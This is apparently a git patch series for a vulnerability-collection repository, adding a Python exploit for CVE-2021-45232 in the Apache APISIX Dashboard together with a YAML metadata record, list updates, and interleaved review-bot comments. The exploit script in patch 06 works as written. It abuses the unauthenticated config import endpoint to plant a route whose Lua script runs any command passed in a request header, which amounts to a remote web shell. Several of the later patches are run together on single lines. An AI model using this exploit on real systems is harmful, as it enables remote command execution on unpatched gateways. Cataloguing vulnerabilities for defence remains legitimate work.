From 1c3f65e64c3ffdb5300e10288109b4e5acd38ac9 Mon Sep 17 00:00:00 2001
From: visity
Date: Wed, 22 Mar 2023 04:48:32 +0000
Subject: [PATCH 01/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20Apache-APISIX?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/Apache-APISIX/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/Apache-APISIX/.keep
diff --git a/cve/Apache-APISIX/.keep b/cve/Apache-APISIX/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 5b1d51aa927a6ff2e5f264107a17a92688740651 Mon Sep 17 00:00:00 2001
From: visity
Date: Wed, 22 Mar 2023 04:49:00 +0000
Subject: [PATCH 02/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/Apache-APISIX/2021/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/Apache-APISIX/2021/.keep
diff --git a/cve/Apache-APISIX/2021/.keep b/cve/Apache-APISIX/2021/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 2a2dd85ca3cbc4be4c9f02142b146cc44a86c530 Mon Sep 17 00:00:00 2001
From: visity
Date: Wed, 22 Mar 2023 04:49:15 +0000
Subject: [PATCH 03/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/Apache-APISIX/2021/yaml/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/Apache-APISIX/2021/yaml/.keep
diff --git a/cve/Apache-APISIX/2021/yaml/.keep b/cve/Apache-APISIX/2021/yaml/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From d4775c8ab2a73f7027fd3b7dbb36cc804b7ff9df Mon Sep 17 00:00:00 2001
From: visity
Date: Wed, 22 Mar 2023 04:49:48 +0000
Subject: [PATCH 04/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20cve-2021-45232?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/Apache-APISIX/2021/cve-2021-45232/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/Apache-APISIX/2021/cve-2021-45232/.keep
diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/.keep b/cve/Apache-APISIX/2021/cve-2021-45232/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From e8d86ffecc98f4638445200d9aee3573558d4ac9 Mon Sep 17 00:00:00 2001
From: visity
Date: Wed, 22 Mar 2023 04:50:05 +0000
Subject: [PATCH 05/14] add cve/Apache-APISIX/2021/cve-2021-45232.
Signed-off-by: visity
---
cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md
diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md b/cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md
new file mode 100644
index 00000000..e69de29b
-- Gitee
From fe3b5ba42e3a54bae45baa90cef63cd830134ddc Mon Sep 17 00:00:00 2001
From: visity
Date: Wed, 22 Mar 2023 04:50:39 +0000
Subject: [PATCH 06/14] add cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py.
Signed-off-by: visity
---
.../cve-2021-45232/apisix_dashboard_rce.py | 93 +++++++++++++++++++
1 file changed, 93 insertions(+)
create mode 100644 cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
new file mode 100644
index 00000000..edd12c9f
--- /dev/null
+++ b/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
@@ -0,0 +1,93 @@
+#!/usr/bin/env python3
+import zlib
+import json
+import random
+import requests
+import string
+import sys
+from urllib3.exceptions import InsecureRequestWarning
+
+# Suppress only the single warning from urllib3 needed.
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+
+eval_config = {
+ "Counsumers": [],
+ "Routes": [
+ {
+ "id": str(random.randint(100000000000000000, 1000000000000000000)),
+ "create_time": 1640674554,
+ "update_time": 1640677637,
+ "uris": [
+ "/rce"
+ ],
+ "name": "rce",
+ "methods": [
+ "GET",
+ "POST",
+ "PUT",
+ "DELETE",
+ "PATCH",
+ "HEAD",
+ "OPTIONS",
+ "CONNECT",
+ "TRACE"
+ ],
+ "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
+ "status": 1
+ }
+ ],
+ "Services": [],
+ "SSLs": [],
+ "Upstreams": [],
+ "Scripts": [],
+ "GlobalPlugins": [],
+ "PluginConfigs": []
+}
+
+
+def random_str():
+ return ''.join(random.choices(string.ascii_letters + string.digits, k=6))
+
+
+def calc_crc(data):
+ crc32 = zlib.crc32(data) & 0xffffffff
+ return crc32.to_bytes(4, byteorder="big")
+
+
+def export_data(url):
+ r = requests.get(url + "/apisix/admin/migrate/export", verify=False)
+ return r.text[:-4]
+
+
+def import_data(url, data):
+ data = json.dumps(data).encode()
+ crc32 = calc_crc(data)
+
+ files = {"file": ("data", data + crc32, "text/data")}
+ resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False)
+ # print(resp.text)
+ if resp.json().get("code", -1) == 0:
+ return True
+ else:
+ return False
+
+
+if __name__ == "__main__":
+ if len(sys.argv) != 2:
+ print("python " + sys.argv[0] + " http://127.0.0.1:9000")
+ exit()
+
+ url = sys.argv[1]
+ if url.endswith("/"):
+ url = url[:-1]
+
+ uri = random_str()
+ eval_config["Routes"][0]["uris"] = [ "/" + uri]
+ eval_config["Routes"][0]["name"] = uri
+
+ if import_data(url, eval_config):
+ print("attack success")
+ print("uri is: " + "/" + uri)
+ else:
+ print("attack error")
\ No newline at end of file
-- Gitee
From ada69e03b977ac0bb06b7132f296b14b827a4c19 Mon Sep 17 00:00:00 2001
From: visity
Date: Wed, 22 Mar 2023 04:53:59 +0000
Subject: [PATCH 07/14] add cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml.
Signed-off-by: visity
---
.../2021/yaml/ cve-2021-45232.yaml | 21 +++++++++++++++++++
1 file changed, 21 insertions(+)
create mode 100644 cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
new file mode 100644
index 00000000..955d5ae9
--- /dev/null
+++ b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
@@ -0,0 +1,21 @@
+id: cve-2021-45232
+source: https://github.com/wuppp/cve-2021-45232-exp
+info:
+ name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。
+ severity: CRITICAL
+ description:
+ CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。
+ scope-of-influence:
+
+ reference:
+ - http://www.openwall.com/lists/oss-security/2021/12/27/1
+ - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232
+ - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5
+ - https://seclists.org/oss-sec/2021/q4/180
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-45232
+ cnvd-id: None
+ kve-id: None
+ tags:
\ No newline at end of file
-- Gitee
From 3c68f4e214711b5fcaf1bbd80ce11f57f3b38ecd Mon Sep 17 00:00:00 2001
From: visity
Date: Wed, 22 Mar 2023 13:38:12 +0000
Subject: [PATCH 08/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/Apache-APISIX/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
delete mode 100644 cve/Apache-APISIX/.keep
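Review bot: `import_data` persists a Route on the target (the `script` field of `eval_config` is written into the Dashboard's configuration) and the `__main__` block only prints the random uri, never recording or removing the route, so every run against a test instance leaves a live endpoint behind; the file needs a header comment stating this, e.g. `# NOTE: a successful run leaves a Route named <uri> in the target's configuration; delete it through the Dashboard once testing is done.` `export_data` is defined but never called from the `__main__` block, so it is dead code here and should be dropped or documented as a manual helper. In the usage branch `exit()` returns status 0 on a bad invocation; `sys.exit(1)` would let a calling script detect it. Both `requests` calls run with `verify=False` and the urllib3 warning is silenced at import time, a deliberate lab-only choice that a one-line comment on the `disable_warnings` call should spell out.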
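Review bot: The new file's path, `cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml`, carries a leading space in the file name (visible in the `diff --git` header, the diffstat and the commit subject), and every later patch in this series inherits it; renaming to `cve-2021-45232.yaml` before merge avoids tooling that globs the yaml directory skipping or mishandling the record. `cnvd-id: None` and `kve-id: None` are the YAML string `None` rather than a null value; if consumers test these fields for emptiness they will not match — worth checking against the other records in the repository. The `description:` value is a bare multi-line plain scalar; a `>` block indicator would make the folding explicit.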
diff --git a/cve/Apache-APISIX/.keep b/cve/Apache-APISIX/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 6cbcd6b392fc003c90f70d0a5311a85a5de4a97f Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 13:43:05 +0000 Subject: [PATCH 09/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Apache-APISIX/2021/.keep diff --git a/cve/Apache-APISIX/2021/.keep b/cve/Apache-APISIX/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From bdc2be4022df3d8b1946df94e64885b00091e15d Mon Sep 17 00:00:00 2001 From: visity Date: Wed, 22 Mar 2023 13:46:19 +0000 Subject: [PATCH 10/14] update cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml. Signed-off-by: visity --- cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml index 955d5ae9..a43a8a89 100644 --- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml +++ b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml @@ -1,12 +1,12 @@ -id: cve-2021-45232 +id: CVE-2021-45232 source: https://github.com/wuppp/cve-2021-45232-exp info: name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 severity: CRITICAL description: - CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 + CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 scope-of-influence: - + In Apache APISIX Dashboard before 2.10.1 reference: - http://www.openwall.com/lists/oss-security/2021/12/27/1 - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 
@@ -16,6 +16,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-45232
+ cwe-id: CWE-306
cnvd-id: None
kve-id: None
tags:
\ No newline at end of file
-- Gitee
From 015f04d4a923409f9f4695a6fab76903350e1077 Mon Sep 17 00:00:00 2001
From: visity
Date: Wed, 22 Mar 2023 13:46:28 +0000
Subject: [PATCH 11/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2021/yaml/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/Apache-APISIX/2021/yaml/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
delete mode 100644 cve/Apache-APISIX/2021/yaml/.keep
diff --git a/cve/Apache-APISIX/2021/yaml/.keep b/cve/Apache-APISIX/2021/yaml/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 251252ef99b0b2d00cbe1a0a372460f22e446abf Mon Sep 17 00:00:00 2001
From: visity
Date: Wed, 22 Mar 2023 13:46:47 +0000
Subject: [PATCH 12/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2021/cve-2021-45232/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/Apache-APISIX/2021/cve-2021-45232/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
delete mode 100644 cve/Apache-APISIX/2021/cve-2021-45232/.keep
diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/.keep b/cve/Apache-APISIX/2021/cve-2021-45232/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 626713ede7790b24a17dbee6bf1f0b94bbe560a6 Mon Sep 17 00:00:00 2001
From: visity
Date: Thu, 23 Mar 2023 02:47:45 +0000
Subject: [PATCH 13/14] update cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml.
Signed-off-by: visity
---
cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
index a43a8a89..ad102017 100644
--- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml +++ b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-306 cnvd-id: None kve-id: None - tags: \ No newline at end of file + tags: cve2021 \ No newline at end of file -- Gitee From 9533f22f32701e386f79612914e0c61fcdab70f0 Mon Sep 17 00:00:00 2001 From: visity Date: Thu, 23 Mar 2023 02:49:40 +0000 Subject: [PATCH 14/14] update openkylin_list.yaml. Signed-off-by: visity --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 83d154a9..bde273b1 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -6,6 +6,7 @@ cve: - CVE-2021-42013 apache-APISIX: - CVE-2022-24112 + - CVE-2021-45232 apache-activemq: - CVE-2020-13932 apache-CouchDB: -- Gitee